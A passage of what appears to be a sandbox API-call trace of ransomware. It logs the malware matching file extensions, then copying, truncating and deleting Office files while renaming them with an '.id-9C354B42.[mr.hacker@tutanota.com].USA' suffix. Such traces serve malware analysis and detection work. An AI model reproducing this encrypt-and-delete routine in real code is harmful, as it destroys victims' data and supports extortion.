5 [0036.679] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0036.679] lstrlenW (lpString=".ppt") returned 4 [0036.679] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.679] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0036.679] lstrlenW (lpString=".zip") returned 4 [0036.679] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.679] lstrlenW (lpString=".rar") returned 4 [0036.679] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.679] lstrlenW (lpString=".bz2") returned 4 [0036.679] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.679] lstrlenW (lpString=".7z") returned 3 [0036.679] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.679] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0036.679] lstrlenW (lpString=".dbf") returned 4 [0036.679] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.679] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0036.679] lstrlenW (lpString=".1cd") returned 4 [0036.679] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.679] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0036.679] lstrlenW (lpString=".jpg") returned 4 [0036.679] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.679] lstrcmpiW (lpString1=".HTM", lpString2=".USA") returned -1 [0036.679] lstrlenW (lpString="README.HTM") returned 10 [0036.679] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0036.987] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1941) returned 1 [0036.987] CloseHandle (hObject=0x1c4) returned 1 [0036.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm")) returned 0x20 [0036.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0036.988] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0036.988] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0036.988] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0036.988] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0036.988] GetLastError () returned 0x0 [0036.988] ReadFile (in: hFile=0x1c4, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x795, lpOverlapped=0x0) returned 1 [0037.206] WriteFile (in: hFile=0x1a8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x7a0, lpOverlapped=0x0) returned 1 [0037.207] ReadFile (in: hFile=0x1c4, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0037.207] WriteFile (in: hFile=0x1a8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xe8, lpOverlapped=0x0) returned 1 [0037.207] SetEndOfFile (hFile=0x1a8) returned 1 [0037.207] CloseHandle (hObject=0x1a8) returned 1 [0037.207] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.207] SetEndOfFile (hFile=0x1c4) returned 1 [0037.208] CloseHandle (hObject=0x1c4) returned 1 [0037.208] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0037.208] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm")) returned 1 [0037.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.209] lstrlenW (lpString=".doc") returned 4 [0037.209] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0037.209] lstrlenW (lpString=".docx") returned 5 [0037.209] lstrcmpiW (lpString1=".docx", lpString2="E.HTM") returned -1 [0037.209] lstrlenW (lpString=".pdf") returned 4 [0037.209] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0037.209] lstrlenW (lpString=".xls") returned 4 [0037.209] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0037.209] lstrlenW (lpString=".xlsx") returned 5 [0037.209] lstrcmpiW (lpString1=".xlsx", lpString2="E.HTM") returned -1 [0037.209] lstrlenW (lpString=".ppt") returned 4 [0037.209] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0037.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.209] lstrlenW (lpString=".zip") returned 4 [0037.209] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0037.209] lstrlenW (lpString=".rar") returned 4 [0037.209] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0037.209] lstrlenW (lpString=".bz2") returned 4 [0037.209] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0037.209] lstrlenW (lpString=".7z") returned 3 [0037.209] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0037.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.209] lstrlenW (lpString=".dbf") returned 4 [0037.209] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0037.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.209] lstrlenW (lpString=".1cd") returned 4 [0037.210] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0037.210] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.210] lstrlenW (lpString=".jpg") returned 4 [0037.210] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0037.210] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.210] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.210] lstrlenW (lpString=".doc") returned 4 [0037.210] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0037.210] lstrlenW (lpString=".docx") returned 5 [0037.210] lstrcmpiW (lpString1=".docx", lpString2="E.HTM") returned -1 [0037.210] lstrlenW (lpString=".pdf") returned 4 [0037.210] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0037.210] lstrlenW (lpString=".xls") returned 4 [0037.210] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0037.210] lstrlenW (lpString=".xlsx") returned 5 [0037.210] lstrcmpiW (lpString1=".xlsx", lpString2="E.HTM") returned -1 [0037.210] lstrlenW (lpString=".ppt") returned 4 [0037.210] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0037.210] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.210] lstrlenW (lpString=".zip") returned 4 [0037.210] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0037.210] lstrlenW (lpString=".rar") returned 4 [0037.210] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0037.210] lstrlenW (lpString=".bz2") returned 4 [0037.210] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0037.210] lstrlenW (lpString=".7z") returned 3 [0037.210] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0037.210] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.210] lstrlenW (lpString=".dbf") returned 4 [0037.210] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0037.210] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.210] lstrlenW (lpString=".1cd") returned 4 [0037.210] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0037.211] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.211] lstrlenW (lpString=".jpg") returned 4 [0037.211] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0037.211] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0037.211] lstrlenW (lpString="SETUP.XML") returned 9 [0037.211] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0037.253] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1452) returned 1 [0037.253] CloseHandle (hObject=0x1cc) returned 1 [0037.253] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml")) returned 0x20 [0037.253] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0037.253] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0037.253] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.253] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.253] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0037.258] GetLastError () returned 0x0 [0037.258] ReadFile (in: hFile=0x1cc, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x5ac, lpOverlapped=0x0) returned 1 [0037.269] WriteFile (in: hFile=0x1a8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0037.270] ReadFile (in: hFile=0x1cc, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0037.270] WriteFile (in: hFile=0x1a8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0037.270] SetEndOfFile (hFile=0x1a8) returned 1 [0037.270] CloseHandle (hObject=0x1a8) returned 1 [0037.271] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.271] SetEndOfFile (hFile=0x1cc) returned 1 [0037.272] CloseHandle (hObject=0x1cc) returned 1 [0037.272] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0037.272] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml")) returned 1 [0037.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0037.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0037.272] lstrlenW (lpString=".doc") returned 4 [0037.272] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.272] lstrlenW (lpString=".docx") returned 5 [0037.272] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0037.272] lstrlenW (lpString=".pdf") returned 4 [0037.272] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.272] lstrlenW (lpString=".xls") returned 4 [0037.272] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.272] lstrlenW (lpString=".xlsx") returned 5 [0037.272] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0037.273] lstrlenW (lpString=".ppt") returned 4 [0037.273] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0037.273] lstrlenW (lpString=".zip") returned 4 [0037.273] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.273] lstrlenW (lpString=".rar") returned 4 [0037.273] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.273] lstrlenW (lpString=".bz2") returned 4 [0037.273] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.273] lstrlenW (lpString=".7z") returned 3 [0037.273] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0037.273] lstrlenW (lpString=".dbf") returned 4 [0037.273] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0037.273] lstrlenW (lpString=".1cd") returned 4 [0037.273] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0037.273] lstrlenW (lpString=".jpg") returned 4 [0037.273] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0037.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0037.273] lstrlenW (lpString=".doc") returned 4 [0037.273] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.273] lstrlenW (lpString=".docx") returned 5 [0037.273] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0037.273] lstrlenW (lpString=".pdf") returned 4 [0037.273] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.273] lstrlenW (lpString=".xls") returned 4 [0037.273] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.273] lstrlenW (lpString=".xlsx") returned 5 [0037.273] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0037.274] lstrlenW (lpString=".ppt") returned 4 [0037.274] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0037.274] lstrlenW (lpString=".zip") returned 4 [0037.274] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.274] lstrlenW (lpString=".rar") returned 4 [0037.274] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.274] lstrlenW (lpString=".bz2") returned 4 [0037.274] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.274] lstrlenW (lpString=".7z") returned 3 [0037.274] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0037.274] lstrlenW (lpString=".dbf") returned 4 [0037.274] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0037.274] lstrlenW (lpString=".1cd") returned 4 [0037.274] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0037.274] lstrlenW (lpString=".jpg") returned 4 [0037.274] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.274] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0037.274] lstrlenW (lpString="BRANDING.XML") returned 12 [0037.274] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0037.284] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=596341) returned 1 [0037.284] CloseHandle (hObject=0x1d0) returned 1 [0037.284] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml")) returned 0x20 [0037.284] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0037.285] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0037.285] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.285] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.285] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0037.285] GetLastError () returned 0x0 [0037.285] ReadFile (in: hFile=0x1d0, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x91975, lpOverlapped=0x0) returned 1 [0037.309] WriteFile (in: hFile=0x1c4, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x91980, lpOverlapped=0x0) returned 1 [0037.563] ReadFile (in: hFile=0x1d0, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0037.564] WriteFile (in: hFile=0x1c4, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0037.564] SetEndOfFile (hFile=0x1c4) returned 1 [0038.329] CloseHandle (hObject=0x1c4) returned 1 [0039.342] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0039.343] SetEndOfFile (hFile=0x1d0) returned 1 [0039.348] CloseHandle (hObject=0x1d0) returned 1 [0039.348] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0039.348] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml")) returned 1 [0040.043] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.043] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.043] lstrlenW (lpString=".doc") returned 4 [0040.043] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.043] lstrlenW (lpString=".docx") returned 5 [0040.043] lstrcmpiW (lpString1=".docx", lpString2="G.XML") returned -1 [0040.043] lstrlenW (lpString=".pdf") returned 4 [0040.043] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.043] lstrlenW (lpString=".xls") returned 4 [0040.043] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.043] lstrlenW (lpString=".xlsx") returned 5 [0040.043] lstrcmpiW (lpString1=".xlsx", lpString2="G.XML") returned -1 [0040.043] lstrlenW (lpString=".ppt") returned 4 [0040.043] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.043] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.043] lstrlenW (lpString=".zip") returned 4 [0040.043] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.043] lstrlenW (lpString=".rar") returned 4 [0040.043] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.043] lstrlenW (lpString=".bz2") returned 4 [0040.043] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.043] lstrlenW (lpString=".7z") returned 3 [0040.043] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.043] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.043] lstrlenW (lpString=".dbf") returned 4 [0040.043] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.043] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.043] lstrlenW (lpString=".1cd") returned 4 [0040.043] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.044] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.044] lstrlenW (lpString=".jpg") returned 4 [0040.044] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.044] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.044] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.044] lstrlenW (lpString=".doc") returned 4 [0040.044] lstrcmpiW (lpString1=".doc", lpString2=".XML") 